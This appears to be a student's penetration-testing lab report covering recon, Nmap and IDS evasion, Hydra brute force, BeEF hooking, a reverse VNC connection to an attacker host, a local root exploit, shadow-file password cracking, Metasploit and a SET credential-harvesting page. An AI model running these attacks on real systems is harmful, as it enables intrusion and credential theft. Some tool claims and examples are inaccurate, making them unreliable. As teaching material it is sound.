Module : MOD004891

SID: 2170041
Module name: Penetration Testing
Title: 011-1 Element Assignment
Table of Contents
WEEK 1: LAB 1 – LINUX FAMILIARITY .................................................................................................... 5

WEEK 2 – FOOT PRINTING AND RECONNAISSANCE ....................................................................... 9

2.1 FOOT PRINTING AND INFORMATION GATHERING................................................................................. 9

2.2 ADVANCED GOOGLE OPERATORS .................................................................................................. 14

WEEK 3 – SCANNING NETWORKS................................................................................................ 20

3.1 SCANNING WITH NMAP.............................................................................................................. 20

3.2 VULNERABILITY SCANNING WITH NESSUS........................................................................................ 23
3.3 NETWORK ANALYSIS.................................................................................................................. 26
3.4 EVADING IDS........................................................................................................................... 28
3.5 PACKET CRAFTING HPING3. ......................................................................................................... 32

WEEK 4 – ENUMERATION ........................................................................................................... 35

4.1 ENUMERATING SAMBA SERVER WITH ENUM4LINUX AND SMBCLIENT ..................................................... 35

4.2 CRACKING SAMBA PASSWORD USING XHYDRA ................................................................................ 35

WEEK 5 – SYSTEM HACKING 1..................................................................................................... 37

5.1 CLIENT-SIDE EXPLOITATION ......................................................................................................... 37

5.2 VNC AS A BACKDOOR ............................................................................................................. 38
5.3 STEGANOGRAPHY ..................................................................................................................... 41
5.4 PRIVILEGE ESCALATION .............................................................................................................. 43

WEEK 6 – SYSTEM HACKING 2..................................................................................................... 44

6.1 PASSWORD CRACKING USING JTR AND HASHCAT ............................................................................. 44

.................................................................................................................................................. 46
.................................................................................................................................................. 46
6.2 METASPLOIT FUNDAMENTALS ...................................................................................................... 47
6.3 SETOOLKIT FUNDAMENTALS ........................................................................................................ 49

WEEK 8 – SESSION HIJACKING .................................................................................................... 51

8.1 PACKET CRAFTING USING SCAPY. .................................................................................................. 51

8.2. PACKET CRAFTING USING HPING3. ............................................................................................... 52

WEEK 9 - HACKING WEB SERVERS AND WEB APPLICATIONS ........................................................ 55

9.1. CREATING AND INSTALLING SSL CERTIFICATES ................................................................................ 55

9.2. CONFIGURING SSL CERTIFICATES ................................................................................................. 56

2170041 2
WEEK 10 – UNDERSTANDING SQL COMMANDS. ......................................................................... 57

WEEK 11 – AUDITING LINUX SYSTEM .......................................................................................... 59

2170041 3
2170041 4
Week 1: Lab 1 – Linux familiarity

This lab sheet includes several exercises to practise using Linux, particularly the shell prompt.
You must utilise Kali Linux, a Linux operating system (on Netlab+). Log in to the Netlab account
Start the Kali Linux instance, when ready
• At the login prompt, enter your username and press the Enter key.
• Enter your password and press the Enter key.

If the username and password are correct, you will be logged in to the Kali Linux operating
system.

Note: If this is the first time try logging into Kali Linux using the default credentials "root"
and "toor". It's strongly recommended to change the default password after first login.

The Linux shell, sometimes known as the "Terminal," is a software that accepts user-supplied
programmes, sends them to the OS for processing, and displays (occasionally) the results. You
will see the "prompt" when you enter the Terminal, which gives you details like the username
(student), host name (kali), and current folder (which stands for "home"). The dollar symbol
($) denotes a user with no privileges, but the hash (#) denotes a user with full privileges or
root rights, and finally it will identify the kind of user. This indicates that the user is now able
to carry out instructions without the need for superuser rights.

Fig 1 Illustrates the Linux login prompt

Fig 1.0 Illustrates the Linux login prompt

2170041 5
ls: The ls command is used to list the files and directories in the current directory. You can use
various options with the ls command to change the output format. For example, using the -l
option will display the files and directories in a long format, including the permissions,
ownership, and timestamps.

Fig 1.1 Illustrates the present working directory with root directory listed.

pwd: The pwd command is used to print the current working directory. This command will
display the full path of the current working directory.

cd: The cd command is used to change the current working directory. The command takes
the name of the directory as an argument. For example, cd Documents will change the current

working directory to the Documents directory.

Fig 1.2 Illustrates the creation of directory

mkdir: The mkdir command is used to create a new directory. The command takes the name
of the directory as an argument. For example, mkdir VAPT will create a new directory called
"VAPT" in the current working directory.

touch: The touch command is used to create a new file. The command takes the name of the
file as an argument. For example, touch test will create a new file called "test" in the current
working directory.

Fig 1.3 Illustrates touch command and writing text into the file

2170041 6
rm: The rm command is used to remove files or directories. The command takes the name of
the file or directory as an argument. For example, rm test will remove the file called "file.txt"
in the current working directory.

Fig 1.4 Illustrates the deletion of test file

cp: The cp command is used to copy files or directories. The command takes the name of the
source file or directory and the destination as arguments. For example, cp file.txt
/home/backup will copy the file "file.txt" from the current working directory to the
"/home/backup" directory.

Fig 1.5 Illustrates the copy command

mv: The mv command is used to move or rename files or directories. The command takes the
name of the source file or directory and the destination as arguments. For example, mv file.txt
/home/backup will move the file "file.txt" from the current working directory to the
"/home/backup" directory. And mv file.txt new_file.txt will rename the file "file.txt" as
"new_file.txt"

Fig 1.6 Illustrates the cat command used to display content of the test file

cat: The cat command is used to view the contents of a file. The command takes the name of
the file as an argument. For example, cat file.txt will display the contents of the file called
"file.txt" on the screen.

2170041 7
grep: The grep command is used to search for text within a file or a group of files. The
command takes the search string and the name of the file or files as arguments. For example,
grep 'example' file.txt will search the file "file.txt" for the string "example" and display any
lines that contain it.

Locate: The locate command is a command-line utility that is used to quickly search and find
files and directories on a Linux system. It works by searching through a database of file and
directory names, called the "locatedb," which is created and updated by the updatedb
command.

It's important to note that locate command only returns results that have been indexed by
updatedb command, which means if you recently created a file, you may need to wait until
next scheduled update or run the updatedb command manually before searching it with
locate command.

2170041 8
Week 2 – Foot printing and Reconnaissance

2.1 Foot printing and Information gathering

Theharvester : TheHarvester is an open-source tool used for harvesting email addresses and
other information from various sources such as search engines, social media platforms, and
others. The tool was developed to support security researchers and penetration testers in
gathering the email addresses of target organizations for use in targeted phishing and social
engineering attacks. TheHarvester can collect information such as email addresses,
subdomains, and usernames from sources such as Google, Bing, Yahoo, LinkedIn, and others.
It's an efficient tool as it allows users to gather large amounts of information in a short amount
of time. The information collected by TheHarvester can then be used to identify potential
targets, plan, and carry out security testing, or support intelligence-gathering efforts.
However, it's important to note that the tool should only be used for ethical purposes and
not for malicious intent.

Fig 2.1 Illustrates the output of theharvester command.

2170041 9
Dmitry: Dmitry (Deep magic Information Gathering Tool) is a versatile open-source system
reconnaissance tool that is used to gather information about a target. It is designed to
perform a wide range of reconnaissance tasks, including but not limited to hostname
resolution, whois lookup, and gathering email addresses and subdomains. Dmitry can also
gather information about open ports, servers, and services running on a target system,
providing valuable information for penetration testing and security assessments. The tool is
highly customizable and can be used in a variety of scenarios, making it an asset for security
professionals. Dmitry is fast and efficient, and it can be used both on its own or as a part of a
larger security toolkit.

Fig 2.2 Illustrates the output of Dmitry command

Metagoofil: It is a powerful open-source tool that is included in Kali Linux, a popular

distribution for penetration testing. Metagoofil is used for information gathering and
reconnaissance. It is designed to search and extract metadata from public documents that are
hosted on websites. This metadata can contain valuable information about a target, such as
the author, creation date, and keywords. Metagoofil can be used to search for a wide range
of file types, including but not limited to PDF, Microsoft Office, and OpenOffice documents.
The tool is fast and efficient, and it can gather a large amount of information in a short amount
of time. The information gathered by Metagoofil can be used to support further
reconnaissance or penetration testing activities, making it a valuable tool for security
professionals.

2170041 10
 Fig 2.3 Illustrates the output of Dmitry command in kali Linux

Maltego: Maltego is a powerful open-source tool that is used for information gathering,
reconnaissance, and threat intelligence. It is a visual analysis tool that allows users to see
connections and relationships between data points. Maltego is primarily used for analysing
and visualizing data from social media networks, websites, and other publicly available
sources.
To use Maltego, users need to first install the software and then perform the following steps:
• Choose a target for the analysis
• Select the appropriate transforms for the type of data to be analysed
• Run the transforms to gather data from various sources
• Visualize the results in a graph format, where relationships between data points can
be easily seen
• Repeat the process as necessary to gather more information and build a
comprehensive picture of the target.

Maltego is a valuable tool for security professionals, as it allows them to gather and visualize
information in a way that is easy to understand and interpret. This can help to identify
potential threats and support further investigations.

2170041 11
 Fig 2.4 Illustrates the output of Maltego using an email transform

Recon-ng: Recon-ng is a powerful open-source reconnaissance tool that is designed for

conducting web-based reconnaissance. It is written in Python and is based on a modular
framework, making it highly customizable and extensible. To use Recon-ng, users need to
perform the following steps:
• Launch Recon-ng
• Load the appropriate modules for the type of information to be gathered
• Configure the modules with the necessary parameters, such as the target domain or
IP address
• Run the modules to gather information from various sources
• Review the results and repeat the process as necessary to gather more information

Recon-ng is an effective tool for conducting web-based reconnaissance and can be used to
gather information about a target, such as email addresses, subdomains, and IP addresses.
The tool can also be used to gather information about open ports, servers, and services
running on a target system. Recon-ng is a valuable tool for security professionals, as it allows
them to gather a large amount of information in a short amount of time. The information
gathered by Recon-ng can be used to support further reconnaissance or penetration testing
activities.

2170041 12
 Fig 2.5 Illustrates the output of Recon-ng command which uses netcraft modules

HTtrack: HTTrack is a free and open-source tool that is used to create a mirror or offline copy
of a website. It is designed to be fast, flexible, and easy to use, making it a popular tool for
web developers and researchers. To use HTTrack, users need to perform the following steps:
Download and install HTTrack

• Launch HTTrack and enter the URL of the website to be mirrored

• Configure the settings, such as the location to save the mirror, the maximum number
of links to follow, and the maximum download speed
• Start the mirroring process by clicking on the "Start" button
• Wait for the process to complete and review the mirror

HTTrack is a valuable tool for web developers who need to create an offline copy of a website
for testing or backup purposes. It is also useful for researchers who need to gather
information about a website for analysis. The tool can be used to mirror dynamic websites,
including those that use JavaScript and other interactive elements. HTTrack is a fast and
efficient tool that can create a mirror of a website in a matter of minutes.

2170041 13
2.2 Advanced Google operators

Advanced Google operators also known as Google dork is a search term that employs
sophisticated search operators to locate certain online data. Cybersecurity experts,
researchers, and hackers frequently utilise it to find security flaws or sensitive information
that is difficult to find using conventional search techniques. A Google dork is usually a string
of letters, numbers, and other symbols that instructs the search engine to seek for certain
information on a certain website or domain. Google Dorks may be a useful tool for data
collection and security testing when utilised morally and responsibly, despite its potential for
misuse.

There are two ways to use

For Beginners

Step 1 Step 2

Fig 2.6 Illustrates the google search bar and steps to perform advance search

Step 1 : Search a keyword on google(Search for something relevant).

Step 2 : From top right corner click on the gear icon, A sidebar will appear with title Advance
Search

Step 3

Fig 2.7 Illustrates the Advance option from the chrome sidebar

Step 3: Click on the advance search option from the sidebar.

2170041 14
 Fig 2.8 Illustrates the Advanced search page

Depending upon the requirements one can use different parameters simultaneously.

For example: Let’s search for a documents file (PDF) which has “Kali Linux” in its title.
So “all these words:” will be “Kali Linux” and “file type” will be “PDF”. This will instruct the
google search algorithm to only show the results which includes PDF file.

2170041 15
 Fig 2.9 Illustrates the output of search operator

Notice the “filetype” operator? Advance users like IT admins, Bug hunters and Hackers uses
these operators to narrow down the result. To know more about the other available
operators follow the advance user section.

2170041 16
Becoming an Advance user

It requires the knowledge of the operators and what purpose it serves. Below is the list of
few operators followed by a real-world example.

Fig 2.1.1 Illustrates google search operators also known as Google dorks

Let’s use these operators and observe what google displays. Starting off with the “allintext:”
“filetype:” and “after:” dork.

Fig 2.1.2 Illustrates the google result using dorks

2170041 17
Explanation

• Allintext – checks if admin text is present in the page

• Filetype – tells google to display result which has the specified file format
• After – sorts the result by the given date

Fig 2.1.3 Illustrates the output of intext operator

Tip: After going through the logs Fig 2.1.4. It was observed that a malicious user has
performed Content discovery/directory brute-forcing attack

Fig 2.1.4 Illustrates content discovery attack

2170041 18
Analysis – It is evident that the response to every request is 404 Not found and the source
IP remains the same. The time interval between each request is in millisecond, perhaps an
automated tool was used to send the request. Additionally, it’s not only brute forcing the
filename but file extension too. Perhaps the user is using Sublist3r for brute forcing the
directory/content

2170041 19
Week 3 – Scanning Networks

3.1 Scanning with Nmap

This section begins with Network mapper, abbreviated as Nmap, is a strong and adaptable
tool used for network research and security audits. To find open ports, running services, and
operating system details of target hosts, it employs several scanning techniques. Nmap may
also be used to investigate vulnerabilities since it can find security gaps in network systems.
It may be modified using a variety of command-line arguments and is compatible with Linux,
Windows, and macOS. Due to its capacity to give thorough and precise information on
network assets, the tool is well-liked by system administrators, security experts, and hackers
alike, making it an essential weapon in any network security practitioner's toolbox.

1. Nmap SYN scan

It is a scanning method in Nmap which is used to find open ports on the network by
sending TCP packets with the SYN flag set to the target host. Because it does not fully
finish the three-way handshake procedure, as is the case with standard TCP
connection formation, this method is also known as "half-open scanning." Nmap waits
for a response before sending the target a SYN packet. The target will reply with a SYN-
ACK packet, signalling that the port is open and accessible for connection, if the port
is open. The scan is then finished when Nmap sends an RST message to break the
connection.

Command - nmap -sS <Target ip or Hostname>

Fig 3.1 Illustrates the output of Nmap SYN scan

2170041 20
 2. Nmap ACK scan.
Another scanning method used by the Nmap programme is called Nmap Ack Scan,
which involves sending TCP packets with the ACK flag set to the target host to find
filtering rules on the network. Ack scan transmits packets as opposed to other
scanning techniques that seek for open ports to see if the firewall is filtering or
blocking the traffic. To determine if a port is being filtered by a firewall or not, the scan
sends the target an ACK packet with a random sequence number. If the target replies
with a RST packet, the port is likely not being filtered. The Nmap Ack scan can help
determine the type of firewall limiting the traffic as well as whether certain services
are filtered or banned by it. This method can be sluggish and may not be compatible
with all firewall types, but it can still be helpful in determining the security posture of
the network.

Command – nmap -sA <Target ip or Hostname>

3. Nmap Script scan

A component of the Nmap tool called Nmap Script Scan enables the use of pre-written
scripts to automate and increase the functionality of the scanning procedure. These
scripts may be used to find security flaws, configuration errors, and vulnerabilities on
target hosts. The scripts are kept in the Nmap script database and are created in the
Lua programming language. You can use a custom collection of scripts using Nmap
Script Scan, or you can use the default script set, which includes more than 600 scripts.
The scripts are divided into groups based on how they work, including those for online
application scanning, brute force assaults, and virus detection. Network
administrators and security experts may use the Nmap Script Scan capability as a
potent tool to automate the scanning process and find network configuration issues
and potential vulnerabilities.

Note : The available nmap script are present in /usr/share/nmap/script directory

Command – nmap –script <script_name> <Target ip or Hostname>

2170041 21
 Fig 3.2 Illustrates Output of Nmap script scan which checks the allowed HTTP methods

2170041 22
3.2 Vulnerability scanning with Nessus

Nessus is a well-known vulnerability scanning tool that security experts use to find security
flaws in software and network architecture. The programme scans the network for flaws that
an attacker may exploit using a comprehensive database of known vulnerabilities and
exploits. To find open ports, services, and software versions on the target network, the Nessus
vulnerability scanner first searches its vulnerability database. The user is informed of any
vulnerabilities found by the programme and given recommendations for how to fix them.
Nessus can scan a wide range of targets, including network devices, databases, servers, and
web applications. Additionally, the tool may be modified to satisfy compliance standards like
PCI-DSS and HIPAA. Overall, Nessus is a crucial tool for managing vulnerabilities since it
enables security experts to proactively find and fix security flaws before attackers can take
use of them.

1. Pre-Scan Phase

Step 1 – Start the Nessus service and

navigate to http://localhost:8834/ and click
on New Scan

Step 2 – Select the type of scan that suits the requirement (In this example Basic Network
Scan is used)

Step 3 – Fill the target related details like Name, Description and Target IP/Domain and click
Save. The target will appear in the task list

Fig 3.3 Illustrates the task list in Nessus

Step 4 – Click the Launch button.

2. Scan Phase

Nessus utilises the plugins’ ability to perform the attacks, attacks such as SQLi, XSS and
Template injection etc. are performed using plugins, which has pre-defined set of payloads.
Nessus uses these payloads and inject them at various parameter. All the discovered
vulnerabilities are then displayed in the table as shown in the fig 3.4.

2170041 23
 Fig 3.4 Illustrates the discovered vulnerabilities by Nessus

3. Post Scan phase

Once the scan finishes a component of the Nessus vulnerability scanner that gives users a
thorough summary of the scan findings is the Nessus Post Scan Dashboard. The dashboard
shows a variety of information and graphs, such as vulnerability numbers, severity ratings,
and historical trends. Users may determine the most important vulnerabilities and order their
repair efforts using the post-scan dashboard's full summary of the scan results.

Users may gain an immediate understanding of the condition of network security thanks to
the dashboard's overview of the target network's vulnerability landscape. Users can make
educated judgements regarding network security thanks to the graphical display of the scan
findings, which enables them to spot trends and patterns in the vulnerability data.

The ability to personalise and filter the results depending on certain criteria, such as the host
operating system, severity level, or plugin family, is one of the primary features of the Nessus
Post Scan Dashboard. This feature enables users to prioritise their repair efforts based on the
vulnerabilities that are most important to their company.

Essentially, the Nessus Post Scan Dashboard is an effective vulnerability management solution
that gives security professionals the opportunity to comprehend the vulnerability landscape
rapidly and simply throughout their target network and take action to strengthen the defence
capabilities of their firm.

Tip : Nessus can generate report of the discovered issues, by clicking on the Export option
and choosing the desired file format, one can generate a user-friendly report.

2170041 24
 1

Fig 3.5 Illustrates the Post Scan dashboard of Nessus

1 – List of all the Vulnerabilities found.

2 – Severity is calculated based on CVSS v3.0
3 – The Chart of the discovered issues for management.

Now following the Pre-Scan phase let’s perform Web application tests. In the previous
example Basic Network Scan plugin was used. However, in this test Web Application tests
plugin will be of use. Let’s select the appropriate plugin, save the task, and launch the scan.

Fig 3.6 Illustrates the Scan report of Web Application tests

2170041 25
3.3 Network Analysis

Why network analysis ?

Network analysis is a crucial step in locating potential security flaws in a target network from
the perspective of a Penetration tester. The procedure entails compiling as much data as
possible on the target network, including its IP addressing methods, open ports, services that
are currently in use, and operating systems. The best way to breach the network is then
decided using this knowledge to spot prospective attack points. Incorrect setups, weak
passwords, and other security flaws that may be exploited by attackers can all be found via
network analysis. Pentesters frequently utilise network analysis tools like Wireshark, Nmap,
and Nessus to gather and analyse network data so they can better understand the security
posture of the target network. In conclusion, network analysis is a crucial step in the
penetration testing process and is essential for spotting possible security flaws that must be
fixed to increase network security as a whole.

Operating System in use Kali Linux

Tcpdump To capture network traffic
Wireshark To analyse network traffic
Smbclient & ping To generate network traffic

1. Login to the Kali Linux (Follow this guide on how to log in to Kali Linux ), launch the
terminal and start tcpdump by typing this command.

Command – tcpdump -i <interface_name> -w capture.pcap

2. Generate traffic, in this example two types of traffic have been generated and
demonstrated: smb and icmp traffic.
• To generate smb traffic

Command – Smbclient -L <target_ip> --option=’client min protocol=NT1’

• To generate icmp traffic

Command - ping <ip>

3. Open the “.pcap” file generated by tcpdump in Wireshark and observe the protocols
involved.

2170041 26
 4. Comparison of SMB traffic and ICMP traffic in Wireshark.

Fig 3.7 Illustrates the SMB traffic in Wireshark

Wireshark filter (More display filters here)

Fig 3.8 Illustrates the ICMP traffic in Wireshark

2170041 27
3.4 Evading IDS

From the standpoint of a penetration tester, avoiding Intrusion Detection Systems (IDS) is an
essential step in the testing procedure. The main objective is to evade detection while trying
to exploit holes in the target network. To get past the IDS, the penetration tester will employ
a variety of methods, including masking the traffic as legal traffic, employing encrypted
payloads, and fragmenting packets to avoid detection. Additionally, they could utilise
alternate ports, protocols, or tunnelling methods to get around the signature-based detection
system of the IDS. To make sure that the evasion strategies continue to work, it is crucial to
stay current with the most recent IDS detection technologies and approaches. It is important
to note that evasion should only be utilised in extreme cases and as a last option because it is
potentially immoral and unlawful to circumvent security measures without the right
authorization. Penetration testing's main objective is to find weaknesses that need to be fixed
to increase network security as a whole, not to harm or disrupt.

Log in to the Netlab+ instance and start the Kali Linux instance and Security Onion instance

Fig 3.9 Illustrates the Netlab+ topology

1. Initializing network monitoring appliance in Security Onion

• Log in to Squert : Username ndg Password password123
• Log in to Snorby : Username [email protected] Password password123
• Log in to Sguil : Username ndg Password password123

2. Generate network traffic from Kali Linux, refer week 1 for “How-to login guide”.

2170041 28
 Use nmap to perform scan and generate traffic.

Command –
• nmap -f <target_ip>
• nmap - -mtu 8 <target_ip>

3. Monitor network traffic in Security Onion.

• Observation of first command on Squert

Fig 3.1.1 Illustrates the dashboard of Squert

2170041 29
 • Observation of first command on Snorby

Fig 3.1.2 Illustrates the Snorby dashboard

• Observation of first command on Sguil

Fig 3.1.3 Illustrates the Sguil events window

Conclusion: Fragmentation attack got detected by the IDS.

2170041 30
 • Observation of second command on Squert

Fig 3.1.4 Illustrates the Squert event list with second command

• Observation of second command on Snorby

Fig 3.1.5 Illustrates the Snorby event list with second command

• Observation of second command on Sguil

Fig 3.1.6 Illustrates the Sguil event list which only shows first command

Takeaway – Packet with - -mtu flag in nmap managed to bypass IDS. To understand better
how MTU fragmentation works can refer to this link.

2170041 31
3.5 Packet crafting Hping3.
Network engineers and security experts utilise the concept of "packet crafting" to build
unique network packets for a variety of uses, including security testing, network
troubleshooting, and network testing. With the help of the well-known packet-crafting
programme Hping, users may deliver unique payloads and alter packet headers to a target
host. Hping may also be used to carry out other kinds of ICMP, SYN, and ACK network scans.
Although Hping is a helpful tool for network engineers and security experts, it has certain
drawbacks. It is less adaptable and expandable than Scapy and does not handle any additional
protocols save TCP, UDP, and ICMP. Another well-liked Python packet-crafting programme
called Scapy is more adaptable and expandable than Hping. A variety of protocols, including
Ethernet, IP, TCP, UDP, DNS, and HTTP are supported by Scapy, and users can design unique
packets from scratch or alter pre-existing packets. Scapy is a more flexible tool than Hping
since it also supports sophisticated capabilities like packet sniffing and injection. Scapy is a
completer and more flexible tool that offers better flexibility and adaptability, whereas Hping
is a good tool for packet creation and network testing.

Crafting ICMP Type 0 packet

Command – hping3 -1 <target_ip>

Fig 3.1.7 Illustrates hping3 command to craft ICMP packet.

2170041 32
Let’s create a sophisticated packet which fetch ICMP timestamp.

Command – hping3 -c 3 -1 -V -C 13 <Target_ip>

utility Count Mode Verbosity ICMP type

Fig 3.1.8 Illustrates the hping3 command to craft an ICMP packet

Retrieval of the timestamp confirms that the host is alive.

Port scanning using hping3

Command – hping3 -S -c 1 -s 5151 -p 80 -V <target_ip>

SYN flag Source port Dest. Port

2170041 33
Let’s analyse the same request in tcpdump..

Fig 3.1.9 Illustrates Tcpdump output of port scan using hping3

Source IP Source Port Direction Dest. IP Dest. Port TCP Flags

The first S is the SYN request sent from the attacker to the target server at port 80 (HTTP)
The second S.(with period) is SYN-ACK packet received as response to the previous request.
The R(Reset) flag was sent to the target as a response to the previous request.

Now, the question is why did the target system sent an RST packet?
Well, very broadly when two system wants to exchange information, they initiate a
handshake (TCP three-way handshake), this handshake is taken care by the kernel itself.
However, in this example even though the packet was sent from the target system. It was
not sent with an intention of establishing a connection but to figure out if the port is
open/closed.

2170041 34
Week 4 – Enumeration

4.1 Enumerating Samba server with enum4linux and Smbclient

Step 1 – Let’s perform initial recon, the goal is to know as much as possible about the target.
Starting off with underlying Operating system and SMB server version.

Command – enum4linux -o <target_ip>

Fig 4.1 Illustrates samba server OS details and service version

4.2 Cracking Samba password using XHydra

The Hydra password cracking tool's graphical user interface (GUI) front-end is called XHydra.
Hydra is a command-line programme used for brute-forcing passwords, which entails
repeatedly trying various character combinations to guess the password. Users who are
unfamiliar with Hydra's command-line interface will find it easier to break passwords using
XHydra. Numerous protocols are supported by XHydra, including HTTP, FTP, IMAP, MySQL,
PostgreSQL, Telnet, and others. It is a flexible tool for cracking passwords across many
platforms and services since it also supports a variety of authentication techniques, including
basic, digest, and NTLM. It's crucial to remember that password cracking requires a lot of
resources and should only be used under competent supervision and in accordance with the
law and ethical standards.

2170041 35
Step 1 – Inside Kali Linux, launch XHydra.
• In Target tab enter the <target_ip>
• In Passwords tab provide the user list “wordlist” & password list “wordlist”
• In Start tab click Start(at the bottom).

Fig 4.2 Illustrates XHydra performing brute force attack on samba server

2170041 36
Week 5 – System Hacking 1

5.1 Client-side exploitation

1. Hooking browser with BeeF framework

• Log in to Kali Linux pod, start BeeF and
navigate to <your_ip>:3000/demos/basic.html
Log in with credential beef and beef.
• To gain control over browser, the BeeF URL
needs to be share with the victim. Once the
victim opens the URL, the browser will be
hijacked.
• In this example, OpenSUSE is the victim with Ip
address 192.168.9.1 and Kali Linux is the
attacker.
• This acts as a confirmation that the victim’s Fig 4.3 Hooked browser
browser has been hijacked. It gets added in the Hooked browser window as
shown in Fig 4.3
• Now the question is What all attacks can be performed on the victim?
• To answer this question, click on the Victim IP in Hooked browsers window. A
whole bunch new tabs will appear on the top

Fig 4.4 Illustrates various attack vector in BeeF Framework

2170041 37
 2. Client Exploitation using BeeF Framework
• Click on the commands tab, A group of folders will appear on the left.
• For demonstration purpose, let’s go with Get Battery status.
• Select the module and click on Execute

Fig 4.5 Illustrates the Get Battery Status on Beef

5.2 VNC as a backdoor

1. Using TightVNC
Log In to OpenSUSE, launch terminal and start vncserver

Command - vncserver :2

Fig 4.6 Illustrates starting of vncserver in OpenSUSE

Login to Kali Linux and Connect to the Vncserver, service started in OpenSUSE.
For Linux based operating system, TightVNC-viewer is available.

2170041 38
 Command - java -jar tightvnc-jviewer.jar

Fig 4.7 Illustrates the TightVNC connection in Kali Linux

2. Reversing VNC Connection

Execute the following command from Kali Linux terminal

Command - vncviewer -listen 0

Now from OpenSUSE, execute two commands

Command – cd /usr/bin
Command - ./xvnc11 -connect 192.168.9.2:5500

2170041 39
 Fig 4.8 Illustrates the OpenSUSE screen in Kali Linux

Kali Linux OpenSUSE

2170041 40
5.3 Steganography

The practise of hiding covert communications in plain sight, such as in digital photos, audio
files, or other forms of digital media, is known as steganography. Steganography may be
employed by hackers to conceal harmful payloads or secretly exfiltrate sensitive data. Hackers
can conceal malware or other harmful code in photos or other media files using
steganography techniques, making it challenging for security tools to identify and stop them.
Steganography may also be used for data exfiltration, which is when malicious parties steal
sensitive information by hiding it in plain sight. From a defensive standpoint, steganography
detection necessitates specific tools and methods, such as sophisticated threat hunting and
digital forensics. Security workers must be familiar with steganography methods.

Numerous tools are available on internet, for windows its Quickstego. For Linux its Steghide
and for Mac its cat command (Yes, it’s the same utility which is used to view content of file)

Command – cat file.jpg file.pdf > secret.jpg

JPEG file PDF file Encrypted file

Fig 4.9 Illustrates the cat command used to embed a pdf file into jpg file

2170041 41
 Fig 4.1.1 Illustrates the hexacode of Secret.jpg file which embeds a pdf file

To verify it, navigate to www.hexed.it. Upload the JPG file and search for PDF.

2170041 42
5.4 Privilege Escalation

The practise of elevating a user's access or privileges on a computer system or network

beyond those that are initially given to them is known as privilege escalation. Attackers
frequently employ this method to get access to sensitive information, set up malware, or
engage in other illegal actions. Privilege escalation may happen in a number of ways, including
through taking advantage of software flaws, configuration errors, weak passwords, or social
engineering strategies.

The Mempodipper hack, which takes advantage of a flaw in the /proc/pid/mem file of the
Linux kernel, is one instance of a privilege escalation exploit. By overwriting kernel memory,
this vulnerability enables an attacker to take control of the target system at the root level.
Once the attacker has root-level access, they may carry out nefarious actions that would not
be feasible with lower-level privileges, such as installing malware, stealing confidential
information, and more. To stop privilege escalation attacks, systems and apps must be
patched and updated often.

• Download the exploit from here

• Compile it using the following command: gcc 18411.c -o filename
• Execute the exploit by : ./filename

Before: Standard user

After: Root user

Fig 4.1.2 Illustrates privilege escalation on Ubuntu system

2170041 43
Week 6 – System Hacking 2

6.1 Password Cracking using JTR and Hashcat

Security experts, penetration testers, and ethical hackers frequently employ the password
cracking programmes John the Ripper and Hashcat. These instruments are essential for
evaluating password security and locating holes in authentication systems.

A command-line programme called John the Ripper breaks passwords via brute-force and
dictionary assaults. It can crack a variety of password hashes, including MD5, SHA-1, and
NTLM, and it supports a broad range of operating systems, including Unix, Windows, and
macOS. John the Ripper is a flexible tool that may be altered to meet various password-
cracking requirements.

As opposed to John the Ripper, Hashcat is a more effective and quick password cracking
programme. To break passwords, it combines brute-force, dictionary, and rule-based
assaults. Hashcat is far quicker than John the Ripper in breaking a variety of password hashes,
including WPA/WPA2, NTLM, and SHA-256. It also supports GPU acceleration. John the Ripper
is easier to use than Hashcat, but Hashcat is a more effective password cracking tool,
especially for bigger and more intricate hashes.

In conclusion, Hashcat and John the Ripper are both crucial tools for breaking passwords, and
each has certain advantages and disadvantages. Hashcat is the tool of choice for breaking
difficult passwords since it is quicker and more potent than John the Ripper yet being more
user-friendly and simpler to operate.

Let’s start with JTR first, the first step is merging the Shadow and Passwd file into one file

Fig 6.1 Illustrates the content of Passwd and Shadow file

2170041 44
 Command – unshadow passwd shadow > hashes

Fig 6.2 Illustrates the Unshadow command in Kali Linux

Once both the files are merged, run JTR against the file created

Command – john <hash_file>

Fig 6.3 Illustrates the cracking process by John

2170041 45
Cracking Password using Hashcat

Cracking hash using Hashcat is straight-forward.

Command – Hashcat -m 0 -a 0 <hashfile> <wordlist_file>

Hash type Attack mode

Fig 6.4 Illustrates the different Hash type and Attack modes

-o : Output ( Optional,
the result can be seen
on the screen as
well.)

2170041 46
 Fig 6.5 Illustrates the password cracking process using Hashcat

6.2 Metasploit fundamentals

Log in to the Kali Linux pod, Launch Terminal, and type msfconsole.

Fig 6.6 Illustrates the msfconsole banner

Let’s use Metasploit to scan a web application. Metasploit has in-built scanner just like
nmap name wmap

Step 1 – Load wmap module [Command: load wmap]

Step 2 – Add the site to the module [Command: wmap_sites -a <url> & wmap_targets -t ]
Step 3 – Run the scan [Command: wmap_run -t]

Fig 6.7 Illustrates the output of wmap load and add command

2170041 47
 Fig 6.8 Illustrates the list of issue discovered in the scan

Let’s step ahead and play with Metasploit exploit, the goal of Metasploit exploits is to get
remote access to target computers, run commands, or distribute malware by exploiting
known vulnerabilities. Customized and fine-tuned exploits can be paired with payloads that
achieve the desired results, such as adding a backdoor, stealing confidential information, or
seizing control of a machine.

Step 1 – Use the search command to search for a specific exploit.

Step 2 – Activate the exploit by “use” command
Step 3 – Use “show options” command to see what details the exploit expects from the user

Step 1

Step 2

Step 3

Fig 6.9 Illustrates the use of exploit and basic command

Step 4 – Set the desired payload type

Step 5 – Set the details required by the payload
Step 6 – Execute the exploit

2170041 48
 Step 4

Step 5

Step 6

Fig 6.1.1 Illustrates the Payload option and execution

6.3 SEToolkit fundamentals

Security experts may mimic social engineering attacks using the penetration testing tool
known as the Social-Engineer Toolkit (SET), which is available on Kali Linux. SET is a strong tool
that may be used to simulate actual social engineering attacks, such phishing and credential
harvesting, in order to evaluate the security of a business.

Spear-phishing, website attack vectors, and payload distribution techniques are only a few of
the attack vectors offered by SET. It is intended to automate the creation and execution of
social engineering assaults, making it simpler for testers to efficiently carry out these attacks.
Additionally, SET comes with a variety of editable templates and scripts that testers may use
to customise their assaults and improve their odds of success.

For demonstration purpose, Credential harvesting attack have been performed. Follow the
steps to achieve the same results.

Step 1 – execute SEToolkit command in Kali Linux terminal (I assume the Kali Linux login steps
has been followed here).
Step 2 – Press [Enter] and agree “Terms and Conditions”
Step 3 – SEToolkit > Website attack vector > Credential Harvesting
Step 4 – Select Web templates > Enter <Your IP_Address> then select the desired template.
In this example google was selected.
Step 5 – Enter “y” to start Apache services

2170041 49
Step 6 – A slight modification is needed, just change the URL parameter in Post.php to
<IP_Address>. The complete path to file is /var/www/html/Post.php

Testing the attack

